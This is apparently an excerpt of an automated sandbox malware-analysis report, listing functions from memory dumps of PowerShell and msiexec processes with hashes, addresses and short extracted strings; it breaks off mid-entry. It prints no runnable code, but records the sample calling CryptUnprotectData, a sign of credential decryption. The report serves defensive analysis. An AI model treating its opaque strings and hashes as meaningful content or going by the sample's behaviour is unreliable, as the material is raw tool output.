Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
API String ID: 0-788909730
Opcode ID: bcf6337fba70b5854827b889d923ddc0da3feca3c99fa38860cda99869326f1a
Instruction ID: f80a61aee4322c356b5f537391078469138bc18d26036695a4764d55e82a9462
Opcode Fuzzy Hash: bcf6337fba70b5854827b889d923ddc0da3feca3c99fa38860cda99869326f1a
Instruction Fuzzy Hash: CAE14BF1B0434A8FDB258F69888176ABBB6AFC6210F1485BBF465CF251DA31CC45C7A1

Function 07A3EF55 Relevance: 12.8, Strings: 10, Instructions: 278COMMON

Download Yara Rule

Strings

(dq, xrefs: 07A3F142
(dq, xrefs: 07A3F1E5
4'^q, xrefs: 07A3F254
(dq, xrefs: 07A3F1B0
tP^q, xrefs: 07A3F081
(dq, xrefs: 07A3F1A6
$^q, xrefs: 07A3EFAD
tP^q, xrefs: 07A3F188
tP^q, xrefs: 07A3F08D
tP^q, xrefs: 07A3F17C

Memory Dump Source

Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$tP^q$tP^q$tP^q$tP^q$$^q$(dq$(dq$(dq$(dq
API String ID: 0-100500828
Opcode ID: 613afae8df94a89a21f07933118ceebece1ad4fbd38271d5909b3ce2d7290535
Instruction ID: 173ca020de58b08474f18e6959a438e241ed385c25db45e121e0bc55fd4535e0
Opcode Fuzzy Hash: 613afae8df94a89a21f07933118ceebece1ad4fbd38271d5909b3ce2d7290535
Instruction Fuzzy Hash: 5AA119B5F1020ADFCB248FA8D504A6ABBF2ABC9310F14845AF9119F390DB71DD45CB91

Function 07A37F48 Relevance: 10.3, Strings: 8, Instructions: 316COMMON

Download Yara Rule

Strings

tP^q, xrefs: 07A37FD1
$^q, xrefs: 07A37F5A
$^q, xrefs: 07A37F8C
$^q, xrefs: 07A3822E
4'^q, xrefs: 07A38149
$^q, xrefs: 07A37F80
tP^q, xrefs: 07A37FC5
4'^q, xrefs: 07A38155

Memory Dump Source

Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
API String ID: 0-3865595929
Opcode ID: a2146dbb1f1237cf26e7cd0b92812795476e237f16174669306b8e504ee36726
Instruction ID: e91635033488f42c9fc41c42c35b29726493e0e03f63d485b054e18d7a8778bd
Opcode Fuzzy Hash: a2146dbb1f1237cf26e7cd0b92812795476e237f16174669306b8e504ee36726
Instruction Fuzzy Hash: BFA137B27043068FDB248F69D800B66BBF2AFC6714F24846AF465CF361DA39D845C761

Function 07A3F9D5 Relevance: 7.7, Strings: 6, Instructions: 194COMMON

Download Yara Rule

Strings

XRcq, xrefs: 07A3FB45
XRcq, xrefs: 07A3FA11
tP^q, xrefs: 07A3FAB4
XRcq, xrefs: 07A3FB55
$^q, xrefs: 07A3FA2D
tP^q, xrefs: 07A3FAC0

Memory Dump Source

Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd

Similarity

API ID:
String ID: XRcq$XRcq$XRcq$tP^q$tP^q$$^q
API String ID: 0-1682816917
Opcode ID: 33fc6decea2b6dde426a7e49613ce48e979c9f67e2b024528daed88feb7643dd
Instruction ID: ea4cb74ffbfdd89066392be77716ac27054b428f2e02ef94ae436a38bbbe42ba
Opcode Fuzzy Hash: 33fc6decea2b6dde426a7e49613ce48e979c9f67e2b024528daed88feb7643dd
Instruction Fuzzy Hash: C96116B1F1020A9FCB149F688550A6ABBF2AFC9710F24C46AF8259F395CB31DD45CB91

Function 07A3E697 Relevance: 7.7, Strings: 6, Instructions: 159COMMON

Download Yara Rule

Strings

d%dq, xrefs: 07A3E857
d%dq, xrefs: 07A3E8BB
tP^q, xrefs: 07A3E891
4'^q, xrefs: 07A3E92F
d%dq, xrefs: 07A3E8C5
$^q, xrefs: 07A3E778

Memory Dump Source

Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$d%dq$d%dq$d%dq$tP^q$$^q
API String ID: 0-2098638132
Opcode ID: 5a29db83162a21e30324799fd3a6529e51edfc2410c0f03bf4bdf8558424631c
Instruction ID: c8315015b9fb850d249be2308fee859f51413dcb371ae0bf048b4b4f0834d083
Opcode Fuzzy Hash: 5a29db83162a21e30324799fd3a6529e51edfc2410c0f03bf4bdf8558424631c
Instruction Fuzzy Hash: 6151D3F0A08346DFDB24CF14C550B6ABBF2AF85751F188465F8259B291CB31DD45CB91

Function 094526E8 Relevance: 6.6, Strings: 5, Instructions: 389COMMON

Download Yara Rule

Strings

$^q, xrefs: 09452C32
$^q, xrefs: 09452C0E
tP^q, xrefs: 09452719
tP^q, xrefs: 09452723
$^q, xrefs: 09452C26

Memory Dump Source

Source File: 00000001.00000002.1875215771.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9450000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q$$^q$$^q$$^q
API String ID: 0-578306960
Opcode ID: 6a07197c1feba2561c5e68a0b5acf4ca3337cb654565080deb104ba113d3ea0c
Instruction ID: aa3a9850225c201b8832485f98667df3fcda72d24fb6104f0b119625cdb6851a
Opcode Fuzzy Hash: 6a07197c1feba2561c5e68a0b5acf4ca3337cb654565080deb104ba113d3ea0c
Instruction Fuzzy Hash: D9D1D731B002089FCB15DFA8C85076BBBA2EF84750F14885BED269B356DB72DC46C7A1

Function 07A30538 Relevance: 6.4, Strings: 5, Instructions: 146COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07A30632
4'^q, xrefs: 07A30626
$^q, xrefs: 07A305FD
$^q, xrefs: 07A305C4
$^q, xrefs: 07A30609

Memory Dump Source

Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: 71f17ef6058ac2a8cf34f83a05a6c8fdb95cb523451b7c73c1bb251b4321cfc2
Instruction ID: 951bb0ffda8e8c3d02a03ddc89751eac1e143d20b41c761c455c8f4a91402bb3
Opcode Fuzzy Hash: 71f17ef6058ac2a8cf34f83a05a6c8fdb95cb523451b7c73c1bb251b4321cfc2
Instruction Fuzzy Hash: 3041F6B0B0430ADFDB159F2488107AF7BB3AFC5210F14846AE855CB255DF76C946CBA2

Function 07A3EA18 Relevance: 6.4, Strings: 5, Instructions: 134COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07A3EAFD
$^q, xrefs: 07A3EAC5
4'^q, xrefs: 07A3EAF1
$^q, xrefs: 07A3EAD1
$^q, xrefs: 07A3EA8B

Memory Dump Source

Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: b4a51d6ccaf430603a9242e22fb076fd0487d4149f6e6bc8c6c7e6244146a7fa
Instruction ID: a98b1651b97328516d4de2d39fec96bec1ff1e0c770150f87ca81d81ca2b5ac1
Opcode Fuzzy Hash: b4a51d6ccaf430603a9242e22fb076fd0487d4149f6e6bc8c6c7e6244146a7fa
Instruction Fuzzy Hash: 6C4117B1F0830ACFCB258F69880066ABBF5BFC5211F24C5BAE476C7245DA31C945C761

Function 07A3A990 Relevance: 6.4, Strings: 5, Instructions: 108COMMON

Download Yara Rule

Strings

$^q, xrefs: 07A3A9ED
$^q, xrefs: 07A3AA09
4'^q, xrefs: 07A3AB3B
tP^q, xrefs: 07A3AA8B
$^q, xrefs: 07A3AB06

Memory Dump Source

Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$tP^q$$^q$$^q$$^q
API String ID: 0-3997570045
Opcode ID: c2ef7ad9180e5dbed21f5de0df68db4c857efc0abd3df8c6f6143925fb2bd9ae
Instruction ID: 2ef951b1559a34fc58dc061855bde062987c2758c2d68e9e4536803284127032
Opcode Fuzzy Hash: c2ef7ad9180e5dbed21f5de0df68db4c857efc0abd3df8c6f6143925fb2bd9ae
Instruction Fuzzy Hash: E131C2B2E10226DBDB248F05CA45BA5B7F2AB85720F14C16AF8B55B250C731DC84CB91

Function 07A3E7DE Relevance: 6.3, Strings: 5, Instructions: 85COMMON

Download Yara Rule

Strings

d%dq, xrefs: 07A3E857
d%dq, xrefs: 07A3E8BB
tP^q, xrefs: 07A3E891
4'^q, xrefs: 07A3E92F
d%dq, xrefs: 07A3E8C5

Memory Dump Source

Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$d%dq$d%dq$d%dq$tP^q
API String ID: 0-3846404929
Opcode ID: 399a3d5880a3da79f0c2c5d421fb661f54b80152e147060a17296f89e0e4207d
Instruction ID: 31439e24b857fca53ac62b0981d94763fda968e46055440d538d04089c8739f4
Opcode Fuzzy Hash: 399a3d5880a3da79f0c2c5d421fb661f54b80152e147060a17296f89e0e4207d
Instruction Fuzzy Hash: 18315CB1E04259DFCB28DF58C444A6ABBF2AB88711F248559F825AB354CA31DD42CB91

Function 09450AE0 Relevance: 6.3, Strings: 5, Instructions: 77COMMON

Download Yara Rule

Strings

$^q, xrefs: 09450B14
tP^q, xrefs: 09450B94
$^q, xrefs: 09450B4F
$^q, xrefs: 09450B30
$^q, xrefs: 09450AF8

Memory Dump Source

Source File: 00000001.00000002.1875215771.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9450000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$$^q$$^q$$^q$$^q
API String ID: 0-324510305
Opcode ID: 1a440fef7c2fc6f00094ffcdb41baf143716d937ffde1bfdfb0529a5a35bb653
Instruction ID: e4356908e1c05b22ed72f5de4f5a4cfc8e4be5daa72c4e5e68728455a4ee11d2
Opcode Fuzzy Hash: 1a440fef7c2fc6f00094ffcdb41baf143716d937ffde1bfdfb0529a5a35bb653
Instruction Fuzzy Hash: 3F21A13AA00219DFCB248ED5C984A6AB7E5AF40B59B14406BED0E9F353CB32D944C771

Function 07A3DFA8 Relevance: 5.5, Strings: 4, Instructions: 481COMMON

Download Yara Rule

Strings

(o^q, xrefs: 07A3E09E
(o^q, xrefs: 07A3E08E
(o^q, xrefs: 07A3E3E1
(o^q, xrefs: 07A3E3D1

Memory Dump Source

Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q
API String ID: 0-1978863864
Opcode ID: 34ae27910ac4cfb8c9f53cf2e0bb812310c7970ffbed80b9c8d4a0d40caf4bcb
Instruction ID: 8bf55148a3d95e3ba184a1daa37f69dea9cb3dab33f7cbe1b85bbfe722f0a3ef
Opcode Fuzzy Hash: 34ae27910ac4cfb8c9f53cf2e0bb812310c7970ffbed80b9c8d4a0d40caf4bcb
Instruction Fuzzy Hash: 7DF137B170C30ADFDB158F68D840BAA7BA2AFC6310F14846AF5258F391CB36D945CB61

Function 07A3BDE6 Relevance: 5.4, Strings: 4, Instructions: 403COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07A3C25F
4'^q, xrefs: 07A3C1BB
4'^q, xrefs: 07A3C1A5
4'^q, xrefs: 07A3C249

Memory Dump Source

Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: 44b061b00005f39563e8a3bd8ab18f8ad23725f1634d52ae59944f87dcb8a81b
Instruction ID: 8f0ee359c8a422937dd8857a21108a0cedce20b1085346a74c3dd1eb184cf796
Opcode Fuzzy Hash: 44b061b00005f39563e8a3bd8ab18f8ad23725f1634d52ae59944f87dcb8a81b
Instruction Fuzzy Hash: 5D123BB4A003199FCB14DF54CD81B9ABBB2FB89304F1085A9D5096F795CB72AD85CFA0

Function 0945360A Relevance: 5.3, Strings: 4, Instructions: 324COMMON

Download Yara Rule

Strings

tP^q, xrefs: 09453874
tP^q, xrefs: 09453753
tP^q, xrefs: 09453747
tP^q, xrefs: 09453868

Memory Dump Source

Source File: 00000001.00000002.1875215771.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9450000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q$tP^q$tP^q
API String ID: 0-91886675
Opcode ID: 9040f40f92b8799c8ba327837488185bc0415bdbab7ba2fa0036dfd65094f711
Instruction ID: d86c9da0bac4ce6d224172003a5150bc4e491dee223ba5c67eacff730c332cb8
Opcode Fuzzy Hash: 9040f40f92b8799c8ba327837488185bc0415bdbab7ba2fa0036dfd65094f711
Instruction Fuzzy Hash: FDC1A375A00209DFCB18DF98D54496BBBE2BB88390F14885AFD169B351DB32DC46CBE1

Function 07A39B40 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 07A39B52
$^q, xrefs: 07A39B6E
$^q, xrefs: 07A39BA8
$^q, xrefs: 07A39B9C

Memory Dump Source

Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 8c1e84347cd08a0304443ccfd0cf02231b52bd2fd1f08e0be69e48c72fd926e4
Instruction ID: 9585c2e27b08773effc238f3f9bdad5bc9e9bb0bbbb249b9c612b519e4f88851
Opcode Fuzzy Hash: 8c1e84347cd08a0304443ccfd0cf02231b52bd2fd1f08e0be69e48c72fd926e4
Instruction Fuzzy Hash: 38214DB170030A5FDB345E6A5C44B27B6EA9FC4719F24882AF45ACF385CDB6E845C361

Function 07A3AD63 Relevance: 5.1, Strings: 4, Instructions: 79COMMON

Download Yara Rule

Strings

$^q, xrefs: 07A3AE1B
$^q, xrefs: 07A3ADD7
$^q, xrefs: 07A3AE37
$^q, xrefs: 07A3ADF3

Memory Dump Source

Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 88fc557598d81123da5e1b7935b111f55795660601b1aef4d596754a758b2010
Instruction ID: ee70f95fe6ab755a2dd976c01dd01f5bb8b1dcb79378cfd7a52197ce19ccb60f
Opcode Fuzzy Hash: 88fc557598d81123da5e1b7935b111f55795660601b1aef4d596754a758b2010
Instruction Fuzzy Hash: 182124B5A0433BCFCB208F658444676BBF4AF82650F28C26BF8A48B241D7358484C7A1

Function 07A30308 Relevance: 5.0, Strings: 4, Instructions: 48COMMON

Download Yara Rule

Strings

$^q, xrefs: 07A30352
4'^q, xrefs: 07A3037F
4'^q, xrefs: 07A30373
$^q, xrefs: 07A3035E

Memory Dump Source

Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: 226221dc62049a10260b216a2b87e9304bcd21b8e42cdb9d8c9ed16ba70c73e2
Instruction ID: 9ce5337626ad95a6158c60ddd9bbfc97501d7bc334bb031997d72fa3050f22b4
Opcode Fuzzy Hash: 226221dc62049a10260b216a2b87e9304bcd21b8e42cdb9d8c9ed16ba70c73e2
Instruction Fuzzy Hash: 9E01D471B0E38A8FC72F5B2818601566FF36BC251071944ABD051CF75ACE288C49C3A3

Analysis Process: msiexec.exePID: 7808, Parent PID: 7432COMMON

Execution Graph

Execution Coverage:	7.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.1%
Total number of Nodes:	33
Total number of Limit Nodes:	2

Executed Functions

Function 001FC146 Relevance: 6.5, Strings: 5, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjAp, xrefs: 001FC377
PH^q, xrefs: 001FC3EF
0oAp, xrefs: 001FC20A
PH^q, xrefs: 001FC400
LjAp, xrefs: 001FC38D

Memory Dump Source

Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 7853cc5f0433d7f4dd1a28df9adec9af7108a0ac89bb5912a71dbd2ca2fb243e
Instruction ID: f40761cb666405ab64117bf92acfdf42e1a83dc37e4bef2a8fd8272aef8aa2ce
Opcode Fuzzy Hash: 7853cc5f0433d7f4dd1a28df9adec9af7108a0ac89bb5912a71dbd2ca2fb243e
Instruction Fuzzy Hash: CAA1E574E0421CCFDB14DFAAD984AADBBF2BF89300F148069E509AB361DB319981DF50

Function 001F5362 Relevance: 6.4, Strings: 5, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 001F55C8
LjAp, xrefs: 001F5566
LjAp, xrefs: 001F5550
PH^q, xrefs: 001F55D9
0oAp, xrefs: 001F53E2

Memory Dump Source

Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 9dc0dd136752d52dc66f2c34e6437b770feffb331c1e28ef06f9ad3662717afb
Instruction ID: 636a5a08cc18988a1d0a23a058342aa48b106ce6afb48919d2d6738dabaa8020
Opcode Fuzzy Hash: 9dc0dd136752d52dc66f2c34e6437b770feffb331c1e28ef06f9ad3662717afb
Instruction Fuzzy Hash: 0391F674E00618CFDB14DFAAD884A9DBBF2BF89300F14C06AE509AB365DB349985CF50

Function 001FC468 Relevance: 6.4, Strings: 5, Instructions: 189
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 001FC6BF
LjAp, xrefs: 001FC65D
LjAp, xrefs: 001FC647
PH^q, xrefs: 001FC6D0
0oAp, xrefs: 001FC4DA

Memory Dump Source

Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 6756b3de902fcce58be6d802381e27b7ff7e0b29799fd23bc95abf63d819402f
Instruction ID: ebfeb44e579b3c8a0873f86a60236b607237d13779a0b4c57d7d8019f5f9586c
Opcode Fuzzy Hash: 6756b3de902fcce58be6d802381e27b7ff7e0b29799fd23bc95abf63d819402f
Instruction Fuzzy Hash: BD81C274E04218CFDB14DFAAD984AADBBF2BF88310F149069E518AB365DB309981DF50

Function 001FCCD8 Relevance: 6.4, Strings: 5, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 001FCF2F
PH^q, xrefs: 001FCF40
0oAp, xrefs: 001FCD4A
LjAp, xrefs: 001FCECD
LjAp, xrefs: 001FCEB7

Memory Dump Source

Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 90f479c4f3384c3fdce3c56047b60ee4051ced6219dc9c53cbeb7ef8c43c1925
Instruction ID: e393764fa0a0013e186be7b34b52dacd4a3e957ef2ff1f1be3c085e5322a0dc3
Opcode Fuzzy Hash: 90f479c4f3384c3fdce3c56047b60ee4051ced6219dc9c53cbeb7ef8c43c1925
Instruction Fuzzy Hash: 8681D274E0121CCFDB14DFAAD994AADBBF2BF88300F14C069E519AB265DB309981DF50

Function 001FD278 Relevance: 6.4, Strings: 5, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 001FD4E0
LjAp, xrefs: 001FD46D
PH^q, xrefs: 001FD4CF
LjAp, xrefs: 001FD457
0oAp, xrefs: 001FD2EA

Memory Dump Source

Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 98bba571238d04f30b505920740f99c539c1efb5c92bbbbe0aae86d5773781de
Instruction ID: a9ee575d198286d694be3ee3ce30eacea681a346b6e1edc31291049704da84ce
Opcode Fuzzy Hash: 98bba571238d04f30b505920740f99c539c1efb5c92bbbbe0aae86d5773781de
Instruction Fuzzy Hash: 0881B774E01218CFDB14DFAAD994AADBBF2BF88300F14C069E519AB365DB349985CF50

Function 001FC738 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjAp, xrefs: 001FC917
PH^q, xrefs: 001FC9A0
LjAp, xrefs: 001FC92D
0oAp, xrefs: 001FC7AA
PH^q, xrefs: 001FC98F

Memory Dump Source

Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 692b3cd8267be6355aee6671073d078cfd79d5fde949e9de603e853ff795b7cf
Instruction ID: 384acde6a871efd5c78dd061c6946da7d900d395cdb75a0a0215e3cf6a9b743c
Opcode Fuzzy Hash: 692b3cd8267be6355aee6671073d078cfd79d5fde949e9de603e853ff795b7cf
Instruction Fuzzy Hash: 8E81A274E01218DFDB14DFAAD984AADBBF2BF88300F14C069E518AB365DB749981DF50

Function 001FCA08 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 001FCC5F
LjAp, xrefs: 001FCBE7
LjAp, xrefs: 001FCBFD
PH^q, xrefs: 001FCC70
0oAp, xrefs: 001FCA7A

Memory Dump Source

Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: cd819a2dfc93f656d0f948db43f0953b86d57319389bbedd17eb941b224820fd
Instruction ID: d81ffa2ae748645822f644548338c50fbfb3e670571f268208be9bc17a39d2f1
Opcode Fuzzy Hash: cd819a2dfc93f656d0f948db43f0953b86d57319389bbedd17eb941b224820fd
Instruction Fuzzy Hash: 3581B274E0121CCFDB14DFAAD984AADBBF2BF88300F14C069E519AB265DB359981DF50

Function 001FCFAA Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 001FD210
0oAp, xrefs: 001FD01A
PH^q, xrefs: 001FD1FF
LjAp, xrefs: 001FD187
LjAp, xrefs: 001FD19D

Memory Dump Source

Source File: 00000004.00000002.4115422220.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1f0000_msiexec.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: a4f70c7de04c024799002e4c0a701061266c9174786968b9e47f1e86dbf8c68d
Instruction ID: 5e97e3c535bd30e11ceb2518e65489e22c296eb9ba122187d44621daa3c223f3
Opcode Fuzzy Hash: a4f70c7de04c024799002e4c0a701061266c9174786968b9e47f1e86dbf8c68d
Instruction Fuzzy Hash: 7381C774E05218CFDB14DFAAD984AADBBF2BF88300F14C069E519AB365DB349985CF50

Function 228387A8 Relevance: 1.6, APIs: 1, Instructions: 55
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 22838F5D

Memory Dump Source

Source File: 00000004.00000002.4131810114.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_22830000_msiexec.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 79532b1f53b15a2d6519745a061b90001dfcd7863cef5f96cc3e8356d9776acb
Instruction ID: dffd4049c8ad9daf2880e34d5f1ae06cd6cc169fc436cc345eb6a85527bd958a
Opcode Fuzzy Hash: 79532b1f53b15a2d6519745a061b90001dfcd7863cef5f96cc3e8356d9776acb
Instruction Fuzzy Hash: 31115676800349DFDB10CF99C944BDEBFF5EB48320F108459E958A7210C379A550CFA5

Function 22838EF1 Relevance: 1.6, APIs: 1, Instructions: 53encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 22838F5D

Memory Dump Source

Source File: 00000004.00000002.4131810114.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_22830000_msiexec.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: cd9ab896852d4beabcd4e62ba2013d944ad4686c7035d31dd557ec1f65322cb6
Instruction ID: 2ae8d46f1d30c7dc25388152e01c88c3cbdb1411966335269ca8ed4362201e09
Opcode Fuzzy Hash: cd9ab896852d4beabcd4e62ba2013d944ad4686c7035d31dd557ec1f65322cb6
Instruction Fuzzy Hash: C01164B6800249DFDB11CFA9C945BEEBFF1EF48320F14845AE958A7211C379A590DFA4

Function 22837B78 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4131810114.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_22830000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d913450ff8f9d1c2a63964e60010b17b71d9c193ee826ec9791d49b312b41cfe
Instruction ID: b9f4f8339528281216ca26ea55d678d275ad91c716dd01554c76048f5d767f9c
Opcode Fuzzy Hash: d913450ff8f9d1c2a63964e60010b17b71d9c193ee826ec9791d49b312b41cfe
Instruction Fuzzy Hash: FEE1C174E01318CFEB14CFA5C994B9DBBB2BF89304F2081A9D408A73A5DB759A85CF50

Function 2283B7A8 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4131810114.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_22830000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
